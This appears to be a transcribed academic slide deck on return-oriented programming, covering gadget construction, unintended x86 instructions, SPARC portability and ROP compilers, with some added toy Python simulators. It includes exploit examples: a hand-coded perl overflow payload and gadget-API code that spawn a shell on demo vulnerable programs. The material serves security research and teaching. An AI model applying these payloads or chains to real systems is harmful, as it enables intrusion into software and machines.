Return-Oriented Programming: Exploitation Without Code Injection

Return-oriented programming allows an attacker to execute arbitrary computation on a target system without injecting or executing any code. It works by chaining together small snippets of existing code (called "gadgets") that end in returns, manipulating the stack pointer to cause these snippets to execute sequentially. This technique undermines many security systems by making code injection unnecessary. It is Turing complete and can implement any computation given a sufficiently large codebase to draw gadgets from, such as a library like libc.


Return-oriented Programming: Exploitation without Code Injection

Erik Buchanan, Ryan Roemer, Stefan Savage, Hovav Shacham
University of California, San Diego
Bad code versus bad behavior

[Figure: “bad” behavior is paired with attacker code and “good” behavior with application code, implying that bad behavior requires attacker code.]

Problem: this implication is false!
The return-oriented programming thesis

Any sufficiently large program codebase allows arbitrary attacker computation and behavior, without code injection
(in the absence of control-flow integrity)

Security systems endangered:
` W-xor-X aka DEP
  ` Linux, OpenBSD, Windows XP SP2, MacOS X
  ` Hardware support: AMD NX bit, Intel XD bit
` Trusted computing
` Code signing: Xbox
` Binary hashing: Tripwire, etc.
` … and others
Return-into-libc and W^X
W-xor-X
` Industry response to code injection exploits
` Marks all writeable locations in a process’ address space as nonexecutable
` Deployment: Linux (via PaX patches); OpenBSD; Windows (since XP SP2); OS X (since 10.5); …
` Hardware support: Intel “XD” bit, AMD “NX” bit (and many RISC processors)
Return-into-libc
` Divert control flow of exploited program into libc code
  ` system(), printf(), …
` No code injection required

` Perception of return-into-libc: limited, easy to defeat


` Attacker cannot execute arbitrary code
` Attacker relies on contents of libc — remove system()?

` We show: this perception is false.


The return-oriented programming thesis: return-into-libc special case

Attacker control of the stack allows arbitrary attacker computation and behavior via return-into-libc techniques
(given any sufficiently large codebase to draw on)



Our return-into-libc generalization
` Gives Turing-complete exploit language
  ` exploits aren’t straight-line limited
` Calls no functions at all
  ` can’t be defanged by removing functions like system()
` On the x86, uses “found” insn sequences, not code intentionally placed in libc
  ` difficult to defeat with compiler/assembler changes
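Return-oriented programming

[Figure: a high-level attacker program (connect back to attacker; while socket not eof: read line; fork, exec named progs) is lowered to assembly-like steps (again: mov i(s), ch; cmp ch, ‘|’; jeq pipe; …; decr i; jnz again). Each step is realized by words on the stack that point at instruction sequences found in libc (load, decr, cmp, jnz, jeq).]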
Related Work
` Return-into-libc: Solar Designer, 1997
  ` Exploitation without code injection
` Return-into-libc chaining with retpop: Nergal, 2001
  ` Function returns into another, with or without frame pointer
` Register springs, dark spyrit, 1999
  ` Find unintended “jmp %reg” instructions in program text
` Borrowed code chunks, Krahmer 2005
  ` Look for short code sequences ending in “ret”
  ` Chain together using “ret”
Mounting attack
` Need control of memory around %esp
` Rewrite stack:
  ` Buffer overflow on stack
  ` Format string vuln to rewrite stack contents
` Move stack:
  ` Overwrite saved frame pointer on stack; on leave/ret, move %esp to area under attacker control
  ` Overflow function pointer to a register spring for %esp:
    ` set or modify %esp from an attacker-controlled register
    ` then return
Principles of return-oriented programming
Ordinary programming: the machine level

` Instruction pointer (%eip) determines which instruction to fetch & execute
` Once processor has executed the instruction, it automatically increments %eip to next instruction
` Control flow by changing value of %eip
Return-oriented programming: the machine level

` Stack pointer (%esp) determines which instruction sequence to fetch & execute
` Processor doesn’t automatically increment %esp, but the “ret” at end of each instruction sequence does
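
The dispatch rule above can be illustrated with a toy simulator. This is only a sketch under stated assumptions: the stack is a Python list, %esp is an index into it, and the gadget addresses (0x1000 and so on) and helper names are hypothetical, not taken from any real libc.

```python
# Toy model of return-oriented dispatch. The "stack" is a list of words and
# esp is an index into it. Gadget addresses and names are hypothetical.

def pop_into(reg):
    """Model of 'pop %reg; ret': take the next stack word as an immediate."""
    def body(state):
        state["regs"][reg] = state["stack"][state["esp"]]
        state["esp"] += 1          # the pop consumes one extra stack word
    return body

def add_ebx_to_eax(state):
    """Model of 'add %ebx, %eax; ret' with 32-bit wraparound."""
    regs = state["regs"]
    regs["eax"] = (regs["eax"] + regs["ebx"]) & 0xFFFFFFFF

def nop(state):
    """Model of a bare 'ret': does nothing except let esp advance."""

GADGETS = {
    0x1000: ("nop", nop),
    0x2000: ("pop eax", pop_into("eax")),
    0x3000: ("pop ebx", pop_into("ebx")),
    0x4000: ("add", add_ebx_to_eax),
}

def run_chain(stack, gadgets=GADGETS):
    state = {"esp": 0, "stack": stack, "regs": {"eax": 0, "ebx": 0}}
    trace = []
    while state["esp"] < len(stack):
        # "ret": the word at esp selects the next sequence, then esp advances.
        addr = stack[state["esp"]]
        state["esp"] += 1
        if addr not in gadgets:
            break                  # unknown address: stop the simulation
        name, body = gadgets[addr]
        trace.append(name)
        body(state)
    return state["regs"], trace
```

Running `run_chain([0x1000, 0x2000, 40, 0x3000, 2, 0x4000])` walks the stack from left to right: control flow is driven entirely by the stack contents, and the constants 40 and 2 sit on the stack between sequence addresses.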
No-ops

` No-op instruction does nothing but advance %eip
` Return-oriented equivalent:
  ` point to return instruction
  ` advances %esp
` Useful in nop sled
Immediate constants

` Instructions can encode constants


` Return-oriented equivalent:
` Store on the stack;
` Pop into register to use
Control flow

` Ordinary programming:
` (Conditionally) set %eip to new value
` Return-oriented equivalent:
` (Conditionally) set %esp to new value
l
Gadgets: multiple instruction sequences

` Sometimes more than one instruction sequence needed to encode logical unit
` Example: load from memory into register:
` Load address of source word into %eax
` Load memory at (%eax) into %ebx
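
As a rough illustration of the load gadget, the sketch below models two sequences, one standing in for “pop %eax; ret” and one for “movl (%eax), %ebx; ret”. The addresses, the dictionary used as memory, and all function names are assumptions made for this example.

```python
# Two-sequence "load" gadget in a toy model. Addresses are hypothetical.
A_POP_EAX = 0x2000    # stands in for: pop %eax; ret
A_LOAD_EBX = 0x5000   # stands in for: movl (%eax), %ebx; ret

def pop_eax(regs, stack, esp, memory):
    regs["eax"] = stack[esp]            # address of the source word
    return esp + 1                      # pop consumed one stack word

def load_ebx(regs, stack, esp, memory):
    regs["ebx"] = memory[regs["eax"]]   # load memory at (%eax) into %ebx
    return esp

SEQUENCES = {A_POP_EAX: pop_eax, A_LOAD_EBX: load_ebx}

def run(stack, memory):
    regs = {"eax": 0, "ebx": 0}
    esp = 0
    while esp < len(stack):
        seq = SEQUENCES[stack[esp]]     # "ret" fetches the next sequence
        esp += 1
        esp = seq(regs, stack, esp, memory)
    return regs

def load_gadget(source_addr):
    """Stack layout for the gadget: sequence 1, its operand, sequence 2."""
    return [A_POP_EAX, source_addr, A_LOAD_EBX]
```

For example, `run(load_gadget(0x8000), {0x8000: 0xDEADBEEF})` leaves the word stored at 0x8000 in `ebx`.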
A Gadget Menagerie
Gadget design
` Testbed: libc-2.3.5.so, Fedora Core 4
` Gadgets built from found code sequences:
` load-store
` arithmetic & logic
` control flow
` system calls
` Challenges:
` Code sequences are challenging to use:
` short; perform a small unit of work
` no standard function prologue/epilogue
` haphazard interface, not an ABI
` Some convenient instructions not always available (e.g., lahf)
“The Gadget”: July 1945
Immediate rotate of memory word
Conditional jumps on the x86
` Many instructions set %eflags
` But the conditional jump insns perturb %eip, not %esp
` Our strategy:
` Move flags to general-purpose register
` Compute either delta (if flag is 1) or 0 (if flag is 0)
` Perturb %esp by the computed amount
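
The arithmetic behind this strategy can be checked in a few lines. The function below is a sketch of the delta-or-zero computation on 32-bit words; the function name and parameter names are hypothetical, and the real gadgets carry out each step with separate instruction sequences rather than one function.

```python
MASK = 0xFFFFFFFF  # work in 32-bit words, as on the x86

def conditional_esp(esp, carry_flag, delta):
    """Return the new %esp: esp + delta if the flag is 1, esp unchanged if 0."""
    flag = carry_flag & 1               # flag copied into a general-purpose word
    all_or_none = (-flag) & MASK        # negation: 0 -> 0x00000000, 1 -> 0xFFFFFFFF
    step = all_or_none & (delta & MASK) # bitwise and: delta or zero
    return (esp + step) & MASK          # perturb %esp by the computed amount
```

A negative delta (a backward jump) is passed as its two's-complement word, for example `(-8) & 0xFFFFFFFF`.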
Conditional jump, phase 1: load CF

(As a side effect, neg sets CF if its argument is nonzero)
Conditional jump, phase 2: store CF to memory
Computed jump, phase 3: compute delta-or-zero

Bitwise and with delta (in %esi)

2s-complement negation: 0 becomes 0…0; 1 becomes 1…1
Computed jump, phase 4: perturb %esp using computed delta
Finding instruction sequences (on the x86)

` Any instruction sequence ending in “ret” is useful: it could be part of a gadget

` Algorithmic problem: recover all sequences of valid instructions from libc that end in a “ret” insn
` Idea: at each ret (c3 byte) look back:
  ` are preceding i bytes a valid length-i insn?
  ` recurse from found instructions
` Collect instruction sequences in a trie
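
The look-back search can be sketched as follows. This is a minimal illustration, not the authors' tool: `decode_exact` is a hypothetical, deliberately tiny decoder that knows only a handful of x86 encodings, whereas a real search would use a full disassembler. The trie is a nested dictionary rooted at the “ret”; each child is the instruction immediately preceding its parent.

```python
RET = 0xC3

# Hypothetical toy decoder table: a few one-byte x86 opcodes.
ONE_BYTE = {
    0x45: "inc %ebp",
    0x95: "xchg %ebp, %eax",
    0x58: "pop %eax",
    0x5B: "pop %ebx",
}

def decode_exact(chunk):
    """Return a mnemonic if chunk is exactly one known instruction, else None."""
    if len(chunk) == 1 and chunk[0] in ONE_BYTE:
        return ONE_BYTE[chunk[0]]
    if len(chunk) == 6 and chunk[0] == 0xC7 and chunk[1] == 0x07:
        imm = int.from_bytes(chunk[2:], "little")
        return f"movl $0x{imm:08x}, (%edi)"
    return None

def extend(code, pos, node, max_insn_len, depth):
    """Find instructions ending exactly at pos, add them, recurse from each."""
    if depth == 0:
        return
    for i in range(1, max_insn_len + 1):
        start = pos - i
        if start < 0:
            break
        insn = decode_exact(code[start:pos])  # are the preceding i bytes valid?
        if insn is None:
            continue
        child = node.setdefault(insn, {})
        extend(code, start, child, max_insn_len, depth - 1)

def find_sequences(code, max_insn_len=6, max_depth=4):
    """Build a trie of instruction sequences that end in a ret byte."""
    trie = {}
    for pos, byte in enumerate(code):
        if byte == RET:
            extend(code, pos, trie, max_insn_len, max_depth)
    return trie
```

Reading a path from its deepest node back to the root gives one usable sequence in execution order. Because the search starts from every c3 byte regardless of instruction boundaries, it also finds sequences the compiler never intended.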
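Unintended instructions: ecb_crypt()

Bytes (hex): c7 45 d4 01 00 00 00 f7 c7 07 00 00 00 0f 95 45 c3

Intended decoding:
  c7 45 d4 01 00 00 00    movl $0x00000001, -44(%ebp)
  f7 c7 07 00 00 00       test $0x00000007, %edi
  0f 95 45 c3             setnzb -61(%ebp)

Unintended decoding (starting at the last byte of the movl immediate):
  00 f7                   add %dh, %bh
  c7 07 00 00 00 0f       movl $0x0F000000, (%edi)
  95                      xchg %ebp, %eax
  45                      inc %ebp
  c3                      ret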
Is return-oriented programming x86-specific?
(Spoiler: Answer is no.)
Assumptions in original attack
` Register-memory machine
  ` Gives plentiful opportunities for accessing memory
` Register-starved
  ` Multiple sequences likely to operate on same register
` Instructions are variable-length, unaligned
  ` More instruction sequences exist in libc
  ` Instruction types not issued by compiler may be available
` Unstructured call/ret ABI
  ` Any sequence ending in a return is useful

` True on the x86 … not on RISC architectures



SPARC: the un-x86
` Load-store RISC machine
  ` Only a few special instructions access memory
` Register-rich
  ` 128 registers; 32 available to any given function
` All instructions 32 bits long; alignment enforced
  ` No unintended instructions
` Highly structured calling convention
  ` Register windows
  ` Stack frames have specific format
Return-oriented programming on SPARC
` Use Solaris 10 libc: 1.3 MB
` New techniques:
  ` Use instruction sequences that are suffixes of real functions
  ` Dataflow within a gadget:
    ` Use structured dataflow to dovetail with calling convention
  ` Dataflow between gadgets:
    ` Each gadget is memory-memory
` Turing-complete computation!

` Conjecture: Return-oriented programming likely possible on every architecture.
SPARC Architecture

` Registers:
  ` %i[0-7], %l[0-7], %o[0-7]
  ` Register banks and the “sliding register window”
  ` “call; save”; “ret; restore”
SPARC Architecture

` Stack
` Frame Ptr: %i6/%fp
` Stack Ptr: %o6/%sp
` Return Addr: %i7
` Register save area
Dataflow strategy
` Via register
` On restore, %i registers become %o registers
` First sequence puts output in %i register
` Second sequence reads from corresponding %o register
` Write into stack frame
` On restore, spilled %i, %l registers read from stack
` Earlier sequence writes to spill space for later sequence
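
The register-based dataflow can be pictured with a simplified model of overlapping register windows. This sketch assumes a flat register file in which each window's %o registers are the same storage as the next window's %i registers; the class and method names are hypothetical. It ignores window overflow and spilling to the stack, and the direction in which the window pointer moves is an arbitrary modelling choice.

```python
class RegisterWindows:
    """Simplified sliding register window: 8 in, 8 local, 8 out per window."""

    def __init__(self, n_windows=4):
        self.n_windows = n_windows
        # Window k's outs live at the same slots as window k+1's ins.
        self.phys = [0] * (16 * (n_windows + 1))
        self.cwp = 0  # current window pointer

    def _index(self, name):
        bank, num = name[0], int(name[1])
        offset = {"i": 0, "l": 8, "o": 16}[bank]
        return 16 * self.cwp + offset + num

    def get(self, name):
        return self.phys[self._index(name)]

    def set(self, name, value):
        self.phys[self._index(name)] = value

    def save(self):
        """Enter a new window: the old %o registers become the new %i registers."""
        if self.cwp + 1 >= self.n_windows:
            raise RuntimeError("window overflow is not modelled")
        self.cwp += 1

    def restore(self):
        """Leave the window: its %i registers are visible again as %o registers."""
        if self.cwp == 0:
            raise RuntimeError("window underflow is not modelled")
        self.cwp -= 1
```

In this model, a first sequence that writes `%i0` and then executes restore leaves its result where a second sequence can read it as `%o0`.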
Gadget operations implemented
` Memory
  ` v1 = &v2
  ` v1 = *v2
  ` *v1 = v2
` Assignment
  ` v1 = Value
  ` v1 = v2
` Function Calls
  ` call Function
` System Calls
  ` call syscall with arguments
` Math
  ` v1++
  ` v1--
  ` v1 = -v2
  ` v1 = v2 + v3
  ` v1 = v2 - v3
` Logic
  ` v1 = v2 & v3
  ` v1 = v2 | v3
  ` v1 = ~v2
` Control Flow
  ` BA: jump T1
  ` BE: if (v1 == v2): jump T1, else T2
  ` BLE: if (v1 <= v2): jump T1, else T2
  ` BGE: if (v1 >= v2): jump T1, else T2
Gadget: Addition
` v1 = v2 + v3
Gadget: Branch Equal

if (v1 == v2):
jump T1
else:
jump T2
Automation
Option 1: Write your own
` Hand-coded gadget layout
linux-x86% ./target `perl -e 'print "A"x68, pack("c*",
    0x3e,0x78,0x03,0x03,0x07,
    0x7f,0x02,0x03,0x0b,0x0b,
    0x0b,0x0b,0x18,0xff,0xff,
    0x4f,0x30,0x7f,0x02,0x03,
    0x4f,0x37,0x05,0x03,0xbd,
    0xad,0x06,0x03,0x34,0xff,
    0xff,0x4f,0x07,0x7f,0x02,
    0x03,0x2c,0xff,0xff,0x4f,
    0x30,0xff,0xff,0x4f,0x55,
    0xd7,0x08,0x03,0x34,0xff,
    0xff,0x4f,0xad,0xfb,0xca,
    0xde,0x2f,0x62,0x69,0x6e,
    0x2f,0x73,0x68,0x0)'`
sh-3.1$
Option 2: Gadget API
/* Gadget variable declarations */
g_var_t *num = g_create_var(&prog, "num");
g_var_t *arg0a = g_create_var(&prog, "arg0a");
g_var_t *arg0b = g_create_var(&prog, "arg0b");
g_var_t *arg0Ptr = g_create_var(&prog, "arg0Ptr");
g_var_t *arg1Ptr = g_create_var(&prog, "arg1Ptr");
g_var_t *argvPtr = g_create_var(&prog, "argvPtr");
/* Gadget variable assignments (SYS_execve = 59) */
g_assign_const(&prog, num, 59);
g_assign_const(&prog, arg0a, strToBytes("/bin"));
g_assign_const(&prog, arg0b, strToBytes("/sh"));
g_assign_addr( &prog, arg0Ptr, arg0a);
g_assign_const(&prog, arg1Ptr, 0x0); /* Null */
g_assign_addr( &prog, argvPtr, arg0Ptr);
/* Trap to execve */
g_syscall(&prog, num, arg0Ptr, argvPtr, arg1Ptr, NULL, NULL, NULL);
Gadget API compiler
` Describe program to attack:
char *vulnApp = "./demo-vuln"; /* Exec name of vulnerable app. */
int vulnOffset = 336; /* Offset to %i7 in overflowed frame. */
int numVars = 50; /* Estimate: Number of gadget variables */
int numSeqs = 100; /* Estimate: Number of inst. seq's (packed) */
/* Create and Initialize Program */
init(&prog, (uint32_t) argv[0], vulnApp, vulnOffset, numVars, numSeqs);

` Compiler creates program to exploit vuln app
` Overflow in argv[1]; return-oriented payload in env
` Compiler avoids NUL bytes

sparc@sparc# ./exploit
$
(7 gadgets, 20 sequences, 336 byte overflow, 1280 byte payload)
Option 3: Return-oriented compiler
` Gives high-level interface to gadget API
` Same shellcode as before:

var arg0 = "/bin/sh";
var arg0Ptr = &arg0;
var arg1Ptr = 0;

trap(59, &arg0, &(arg0Ptr), NULL);
Return-oriented selection sort (I)
var i, j, tmp, len = 10;
var* min, p1, p2, a; // Pointers

srandom(time(0)); // Seed random()

a = malloc(40); // a[10]
p1 = a;
printf(&("Unsorted Array:\n"));
for (i = 0; i < len; ++i) {
    // Initialize to small random values
    *p1 = random() & 511;
    printf(&("%d, "), *p1);
    p1 = p1 + 4; // p1++
}
Return-oriented selection sort (II)
p1 = a;
for (i = 0; i < (len - 1); ++i) {
    min = p1;
    p2 = p1 + 4;
    for (j = (i + 1); j < len; ++j) {
        if (*p2 < *min) { min = p2; }
        p2 = p2 + 4; // p2++
    }
    // Swap p1 <-> min
    tmp = *p1; *p1 = *min; *min = tmp;
    p1 = p1 + 4; // p1++
}
Return-oriented selection sort (III)
p1 = a;
printf(&("\n\nSorted Array:\n"));
for (i = 0; i < len; ++i) {
    printf(&("%d, "), *p1);
    p1 = p1 + 4; // p1++
}
printf(&("\n"));
free(a); // Free Memory
Selection sort: compiler output
` 24 KB payload: 152 gadgets, 381 instruction sequences
` No code injection!
sparc@sparc# ./SelectionSort

Unsorted Array:
486, 491, 37, 5, 166, 330, 103, 138, 233, 169,

Sorted Array:
5, 37, 103, 138, 166, 169, 233, 330, 486, 491,
Wrapping up
Conclusions
` Code injection is not necessary for arbitrary exploitation
` Defenses that distinguish “good code” from “bad code” are useless
` Return-oriented programming likely possible on every architecture, not just x86
` Compilers make sophisticated return-oriented exploits easy to write
Questions?

H. Shacham. “The geometry of innocent flesh on the bone: Return-into-libc without function calls (on the x86).” In Proceedings of CCS 2007, Oct. 2007.
E. Buchanan, R. Roemer, S. Savage, and H. Shacham. “When Good Instructions Go Bad: Generalizing Return-Oriented Programming to RISC.” In submission, 2008.

http://cs.ucsd.edu/~hovav/
